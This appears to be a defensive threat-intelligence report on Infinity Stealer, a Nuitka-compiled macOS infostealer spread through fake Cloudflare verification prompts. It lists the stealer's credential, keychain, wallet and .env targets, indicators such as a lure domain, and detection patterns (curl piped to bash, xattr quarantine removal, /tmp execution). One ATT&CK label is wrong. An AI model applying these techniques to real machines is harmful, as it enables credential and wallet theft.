Full Report
A new info-stealing malware named Infinity Stealer is targeting macOS systems with a Python payload packaged as an executable using the open-source Nuitka compiler. [...]
Analysis Summary
# Tool/Technique: Infinity Stealer
## Overview
Infinity Stealer is a sophisticated information-stealing malware specifically designed for macOS. It is notable for being written in Python and compiled into a native Mach-O executable using the Nuitka compiler. The malware is typically delivered via the "ClickFix" social engineering technique, which tricks users into manually executing malicious commands under the guise of a Cloudflare CAPTCHA or human verification check.
## Technical Details
- **Type:** Malware Family (Infostealer)
- **Platform:** macOS
- **Capabilities:** Credential theft, keychain extraction, screenshot capture, cryptocurrency wallet theft, anti-analysis.
- **First Seen:** March 2026 (Reported)
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1566.002 - Phishing: Spearphishing Link]
- **[TA0002 - Execution]**
- [T1059.004 - Command and Scripting Interpreter: Unix Shell]
- [T1204.002 - User Execution: Malicious File]
- **[TA0005 - Defense Evasion]**
- [T1027 - Obfuscated Files or Information]
- [T1140 - Decompile Steps/Code (Nuitka compilation)]
- [T1553.001 - Subvert Trust Controls: Gatekeeper Bypass (xattr removal)]
- [T1497 - Virtualization/Sandbox Evasion]
- **[TA0006 - Credential Access]**
- [T1555.001 - Credentials from Password Stores: Keychain]
- [T1555.003 - Credentials from Password Stores: Web Browsers]
- **[TA0009 - Collection]**
- [T1113 - Screen Capture]
- **[TA0010 - Exfiltration]**
- [T1041 - Exfiltration Over C2 Channel]
## Functionality
### Core Capabilities
- **Browser Harvesting:** Extracts credentials and sensitive data from Chromium-based browsers (Chrome, Edge, etc.) and Firefox.
- **Keychain Access:** Targets the macOS Keychain to steal saved passwords and certificates.
- **Crypto Theft:** Scans for and exfiltrates data related to various cryptocurrency wallet extensions and applications.
- **Developer Secret Harvesting:** Searches for plaintext secrets in developer-centric files, specifically targeting `.env` files.
- **System Capture:** Capable of taking screenshots of the victim's desktop.
### Advanced Features
- **Nuitka Compilation:** Unlike PyInstaller (which bundles bytecode), Nuitka converts Python code into C and then compiles it to a native Mach-O binary. This significantly increases the difficulty of reverse engineering and evades many static analysis signatures.
- **ClickFix Delivery:** Utilizes a highly effective social engineering lure mimicking Cloudflare's human verification, prompting users to copy-paste a malicious `curl` command into their Terminal.
- **Environment Variable Passing:** Sensitive C2 configuration and tokens are passed to the loader via environment variables to avoid hardcoded strings in the binary.
- **Anti-Analysis:** Includes specific checks to detect if the malware is running in virtualized environments or sandboxes before proceeding with the infection.
## Indicators of Compromise
- **File Names:**
- `UpdateHelper.bin` (Stage-3 Payload)
- Nuitka loader (approx. 8.6 MB Mach-O)
- **Network Indicators:**
- `update-check[.]com` (ClickFix lure domain)
- Telegram API (Exfiltration notifications)
- **Behavioral Indicators:**
- Execution of `curl` commands pasted into Terminal containing base64 strings.
- Manual removal of the quarantine flag using `xattr -cr`.
- Use of `nohup` to execute background processes from `/tmp`.
- Terminal windows closing unexpectedly after a script execution.
## Associated Threat Actors
- **Unknown:** Specific group names have not yet been attributed, though the "ClickFix" technique is widely used by various cybercriminal elements.
## Detection Methods
- **Behavioral Detection:** Monitoring for Terminal processes that invoke `curl`, pipe to `bash`, and subsequently run `xattr` to remove quarantine flags on new binaries in `/tmp`.
- **Nuitka Pattern Matching:** Detecting the presence of Nuitka-compiled Python libraries and artifacts within Mach-O binaries.
- **Network Monitoring:** Alerting on POST requests to unknown or suspicious domains immediately following Terminal-based script execution.
## Mitigation Strategies
- **User Education:** Train users to never copy and paste commands from websites into their Terminal, especially those claiming to be "verification steps."
- **Terminal Restrictions:** Implement MDM policies that restrict the use of Terminal for non-administrative users where appropriate.
- **System Hardening:** Ensure macOS Gatekeeper and XProtect are enabled and monitored for bypass attempts.
- **EDR Configuration:** Configure Endpoint Detection and Response (EDR) tools to alert on the removal of the `com.apple.quarantine` attribute from binaries.
## Related Tools/Techniques
- **PyInstaller:** A common but less evasive Python packaging tool.
- **ClearFake / ClickFix:** The broader class of social engineering lures involving fake browser or system updates.
- **Cthulhu Stealer / AMOS:** Other prominent macOS-specific information stealers.